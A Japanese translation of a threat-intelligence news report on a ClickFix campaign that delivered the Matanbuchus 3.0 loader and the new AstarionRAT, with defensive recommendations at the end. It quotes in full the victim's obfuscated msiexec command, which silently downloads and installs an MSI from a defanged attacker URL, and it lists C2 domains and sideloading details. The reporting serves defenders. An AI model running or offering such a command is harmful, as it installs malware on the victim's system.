サイバーセキュリティ研究者は、攻撃者が ClickFix ソーシャルエンジニアリングを使用して Matanbuchus 3.0 マルウェアを配信し、最終的に AstarionRAT という新しいリモートアクセストロジャンを展開した洗練された攻撃チェーンを発見しました。
この侵害は 2026 年 2 月に組織を標的とし、ドメインコントローラーへの急速な横展開を特徴としていました。Huntress チームは、攻撃者がランサムウェアまたはデータ流出の目標を達成する前に、この操作を中断しました。
被害者は「C:\WINDOWS\system32\mSiexeC.EXe」-PaCkAGe hxxp://binclloudapp[.]com/temp/../ValidationID/../466943 /q を実行し、サイレント MSI インストーラーをダウンロードします。
MSI は %APPDATA%\Cybernetics Ltd\Threat Fabric などの正規のセキュリティソフトウェアを模したパスにファイルを抽出し、DLL サイドローディング用に Zillya Antivirus バイナリを使用します。
リネームされた Zillya AV コンポーネントである Core.exe は、Matanbuchus 3.0 である悪意のある SystemStatus.dll を読み込みます。
このローダーは INFO から ShellCode を復号化し、ChaCha20 暗号化を経由して hxxps://marle[.]io/checkupd/profile.aspx からメインモジュールをダウンロードし、%LOCALAPPDATA%\ndvyxgdriggmarrf に 2 段階目のパッケージをドロップします。
Java.exe は偽の jli.dll を読み込み、Lua 5.4.7 インタープリターを組み込んで SySUpd スクリプトを実行します。Lua スクリプトは、メモリ内で AstarionRAT を再構成して実行するリフレクティブ PE ローダーをトリガーします。
この新しい RAT は 24 個のコマンドをサポートし、認証情報の窃取、SOCKS5 プロキシ、ポートスキャン、シェル実行、www[.]ndibstersoft[.]com へのテレメトリーとして偽装された RSA 暗号化 C2 トラフィックを含みます。
攻撃者は C:\ProgramData\USOShared にツールをステージングし、Windows Update を模倣し、40 分以内に PsExec を使用してサーバーとドメインコントローラーに横展開しました。彼らは不正な「DefaultService」アカウントを作成し、Defender 除外を設定しました。
月額 $10,000~$15,000 で価格設定されている MaaS ローダーである Matanbuchus 3.0 は、ジャンクコード、ChaCha20 暗号化、およびEDR 回避技術(KnownDlls アンフッキングなど)を含めるように進化しました。
AstarionRAT の C2 は正規のテレメトリーと混合します。Huntress は、その戦術に基づいて、ランサムウェアの意図を中程度の信頼度と評価しました。
ユーザーにコマンド貼り付けプロンプトに対してトレーニングを実施し、グループポリシー経由で実行ダイアログをオフにし、PsExec、不正なアカウント、EDR 除外の使用を監視し、YARA ルールで検出して防御します。
翻訳元: https://cyberpress.org/matanbuchus-3-0-deploys-astarionrat/